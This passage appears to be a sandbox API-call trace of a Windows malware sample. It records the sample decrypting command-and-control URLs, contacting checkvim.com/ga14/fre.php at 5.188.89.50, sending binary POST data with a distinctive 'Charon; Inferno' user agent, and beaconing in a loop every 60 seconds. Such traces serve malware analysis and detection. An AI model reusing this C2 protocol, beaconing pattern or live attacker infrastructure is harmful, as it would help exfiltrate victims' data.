0x840000 [0225.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0225.350] GetProcessHeap () returned 0x840000 [0225.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0225.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5cc) returned 0x2e8 [0225.357] Sleep (dwMilliseconds=0xea60) [0225.359] GetProcessHeap () returned 0x840000 [0225.359] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0225.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.360] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0225.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.368] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0225.375] GetProcessHeap () returned 0x840000 [0225.375] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0225.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.377] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0225.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.378] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0225.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.379] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.379] GetProcessHeap () returned 0x840000 [0225.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0225.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.380] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0225.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.382] CryptDestroyKey (hKey=0x87e570) returned 1 [0225.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.387] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0225.387] GetProcessHeap () returned 0x840000 [0225.387] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0225.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.389] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.390] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.391] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.393] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.393] GetProcessHeap () returned 0x840000 [0225.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0225.393] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0225.394] GetProcessHeap () returned 0x840000 [0225.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0225.394] GetProcessHeap () returned 0x840000 [0225.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0225.394] GetProcessHeap () returned 0x840000 [0225.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0225.394] GetProcessHeap () returned 0x840000 [0225.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0225.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.395] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0225.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.402] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0225.409] GetProcessHeap () returned 0x840000 [0225.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0225.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.411] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0225.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.411] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0225.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.413] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.413] GetProcessHeap () returned 0x840000 [0225.413] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0225.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.414] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0225.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.415] CryptDestroyKey (hKey=0x87e270) returned 1 [0225.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.416] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0225.416] GetProcessHeap () returned 0x840000 [0225.416] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0225.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.417] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0225.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.418] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0225.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.419] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0225.419] GetProcessHeap () returned 0x840000 [0225.419] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0225.419] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0225.423] GetProcessHeap () returned 0x840000 [0225.423] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0225.423] socket (af=2, type=1, protocol=6) returned 0x2ec [0225.423] connect (s=0x2ec, name=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0225.514] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0225.514] GetProcessHeap () returned 0x840000 [0225.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0225.514] GetProcessHeap () returned 0x840000 [0225.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0225.515] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0225.516] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0225.516] GetProcessHeap () returned 0x840000 [0225.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0225.516] GetProcessHeap () returned 0x840000 [0225.516] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0225.516] GetProcessHeap () returned 0x840000 [0225.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0225.517] GetProcessHeap () returned 0x840000 [0225.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0225.518] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0225.518] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0225.519] GetProcessHeap () returned 0x840000 [0225.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0225.519] GetProcessHeap () returned 0x840000 [0225.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0225.519] send (s=0x2ec, buf=0x873a58*, len=237, flags=0) returned 237 [0225.519] send (s=0x2ec, buf=0x87eb58*, len=159, flags=0) returned 159 [0225.519] GetProcessHeap () returned 0x840000 [0225.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0225.520] recv (in: s=0x2ec, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0225.893] GetProcessHeap () returned 0x840000 [0225.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0225.893] GetProcessHeap () returned 0x840000 [0225.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0225.893] GetProcessHeap () returned 0x840000 [0225.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0225.893] GetProcessHeap () returned 0x840000 [0225.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0225.894] closesocket (s=0x2ec) returned 0 [0225.894] GetProcessHeap () returned 0x840000 [0225.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0225.894] GetProcessHeap () returned 0x840000 [0225.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0225.894] GetProcessHeap () returned 0x840000 [0225.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0225.894] GetProcessHeap () returned 0x840000 [0225.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0225.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5c8) returned 0x2ec [0225.897] Sleep (dwMilliseconds=0xea60) [0225.899] GetProcessHeap () returned 0x840000 [0225.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0225.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.901] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0225.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.937] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0225.945] GetProcessHeap () returned 0x840000 [0225.945] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0225.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.946] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0225.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.948] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0225.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.949] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.949] GetProcessHeap () returned 0x840000 [0225.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0225.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.950] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0225.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.952] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0225.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.953] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0225.953] GetProcessHeap () returned 0x840000 [0225.953] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0225.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.957] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.958] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.960] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.961] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.961] GetProcessHeap () returned 0x840000 [0225.961] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0225.961] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0225.961] GetProcessHeap () returned 0x840000 [0225.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0225.961] GetProcessHeap () returned 0x840000 [0225.962] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0225.962] GetProcessHeap () returned 0x840000 [0225.962] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0225.962] GetProcessHeap () returned 0x840000 [0225.962] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0225.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.963] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0225.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.969] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0225.977] GetProcessHeap () returned 0x840000 [0225.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0225.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.979] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0225.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.980] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0225.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.982] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.982] GetProcessHeap () returned 0x840000 [0225.982] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0225.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.983] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0225.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.984] CryptDestroyKey (hKey=0x87e370) returned 1 [0225.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0225.985] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0225.985] GetProcessHeap () returned 0x840000 [0225.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0225.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.986] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0225.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.988] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0225.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.989] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0225.989] GetProcessHeap () returned 0x840000 [0225.989] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0225.989] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0225.991] GetProcessHeap () returned 0x840000 [0225.991] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0225.991] socket (af=2, type=1, protocol=6) returned 0x2f0 [0225.992] connect (s=0x2f0, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0226.068] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0226.068] GetProcessHeap () returned 0x840000 [0226.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0226.068] GetProcessHeap () returned 0x840000 [0226.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0226.069] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0226.070] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0226.070] GetProcessHeap () returned 0x840000 [0226.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0226.070] GetProcessHeap () returned 0x840000 [0226.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0226.070] GetProcessHeap () returned 0x840000 [0226.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0226.070] GetProcessHeap () returned 0x840000 [0226.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0226.071] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0226.072] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0226.072] GetProcessHeap () returned 0x840000 [0226.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0226.072] GetProcessHeap () returned 0x840000 [0226.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0226.072] send (s=0x2f0, buf=0x873a58*, len=237, flags=0) returned 237 [0226.073] send (s=0x2f0, buf=0x87eb58*, len=159, flags=0) returned 159 [0226.073] GetProcessHeap () returned 0x840000 [0226.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0226.073] recv (in: s=0x2f0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0226.444] GetProcessHeap () returned 0x840000 [0226.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0226.444] GetProcessHeap () returned 0x840000 [0226.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0226.444] GetProcessHeap () returned 0x840000 [0226.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0226.444] GetProcessHeap () returned 0x840000 [0226.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0226.444] closesocket (s=0x2f0) returned 0 [0226.534] GetProcessHeap () returned 0x840000 [0226.534] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0226.534] GetProcessHeap () returned 0x840000 [0226.534] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0226.534] GetProcessHeap () returned 0x840000 [0226.534] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0226.534] GetProcessHeap () returned 0x840000 [0226.534] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0226.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5b0) returned 0x2f0 [0226.582] Sleep (dwMilliseconds=0xea60) [0226.587] GetProcessHeap () returned 0x840000 [0226.587] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0226.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.589] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0226.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.598] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0226.605] GetProcessHeap () returned 0x840000 [0226.605] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0226.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.606] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0226.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.608] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 